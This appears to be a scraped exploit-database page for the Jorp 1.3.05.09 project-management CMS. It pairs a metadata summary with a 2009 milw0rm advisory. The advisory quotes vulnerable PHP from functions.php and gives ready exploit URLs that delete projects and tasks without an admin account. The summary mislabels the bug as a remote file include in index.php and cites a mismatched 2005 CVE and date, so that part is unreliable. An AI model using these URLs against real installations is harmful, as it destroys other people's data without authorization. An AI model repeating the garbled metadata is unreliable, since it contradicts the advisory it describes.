GET vars 'x' & 'y' ADMIN FUNCTION EXECUTION

vendor:

Jorp

by:

Juan Galiana Lara

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: Jorp

Affected Version From: 1.3.05.09

Affected Version To: 1.3.05.09

Patch Exists: YES

Related CWE: CVE-2005-2090

CPE: a:jorp_team:jorp

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2005

GET vars ‘x’ & ‘y’ ADMIN FUNCTION EXECUTION

Jorp is vulnerable to a remote file include vulnerability. This vulnerability is caused due to the use of user-supplied input without proper validation. This can be exploited to execute arbitrary PHP code by including files from remote resources. Successful exploitation of this vulnerability requires that 'register_globals' is set to 'on' and that the vulnerable script is directly requested with the malicious URL. The vulnerable code is located in the 'index.php' script. The following example URL is available: http://[target]/[path]/index.php?x=[malicious_code]&y=1. The malicious code will be executed by the vulnerable script.

Mitigation:

Validate user-supplied input and set 'register_globals' to 'off'.

Source

Exploit-DB raw data:

***********************************************************************************************
***********************************************************************************************
**	       										     **
**  											     **
**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
**							                                     **
**    											     **
**                          Â¡VIVA SPAIN!...Â¡GANAREMOS EL MUNDIAL!...o.O                      **
**					Â¡PROUD TO BE SPANISH!				     **
**											     **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|       	   	   (GET vars 'x' & 'y') ADMIN FUNCTION EXECUTION	     	     |
|--------------------------------------------------------------------------------------------|
|                         	| 	  Jorp v-1.3.05.09       |		 	     |
|  CMS INFORMATION:		 --------------------------------		             |
|										             |
|-->WEB: http://jorp.sourceforge.net/           				             |
|-->DOWNLOAD: http://jorp.sourceforge.net/			            	             |
|-->DEMO: http://jorp.short-stack.net/demo/						     |
|-->CATEGORY: Project Management							     |
|-->DESCRIPTION: Jorp is a simple, web-based project management system.		       	     |
|		It allows you to keep track of projects, tasks, clients,...		     |
|-->RELEASED: 2009-05-07								     |
|											     |
|  CMS VULNERABILITY:									     |
|											     |
|-->TESTED ON: firefox 3								     |
|-->DORK: "2009 Jorp"								             |
|-->CATEGORY: ADMIN FUNCTION EXECUTION						             |
|-->AFFECT VERSION: 1.3.05.09 (maybe <= ?)			 			     |
|-->Discovered Bug date: 2009-05-09							     |
|-->Reported Bug date: 2009-05-09							     |
|-->Fixed bug date: 2009-05-12								     |
|-->Info patch: http://jorp.sourceforge.net/					             |
|-->Author: YEnH4ckEr									     |
|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
|-->WEB/BLOG: N/A									     |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
----------------------------------------------------------------------------------------------


##############################
//////////////////////////////

ADMIN FUNCTION EXECUTION:

/////////////////////////////
##############################


Description: it's possible to remove Projects and Tasks remotely (without admin account).


-----------
FILE VULN:
-----------

Description: GET var 'x' injects the function deleteProject or deleteTask and GET var 'y' points to
ID.

Path --> [HOME_PATH]/functions.php

Lines --> 5-18

Code:

...

if (isset($_GET['x'])){	
	$x=$_GET['x'];	
}	
if (isset($_GET['y'])){		
	$y=$_GET['y'];	}	
if ($x == 'deleteProject')		
	deleteProject($y);	
else if ($x == 'deleteTask')		
	deleteTask($y);
...

---------
EXPLOIT:
---------


--->http://[HOST]/[HOME_PATH]/functions.php?x=deleteProject&y=[ID]

--->http://[HOST]/[HOME_PATH]/functions.php?x=deleteTask&y=[ID]




<<<-----------------------------EOF---------------------------------->>>ENJOY IT!


#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray and Spanish Hack3Rs community!##
##*******************************************************************##
#######################################################################
#######################################################################

# milw0rm.com [2009-05-20]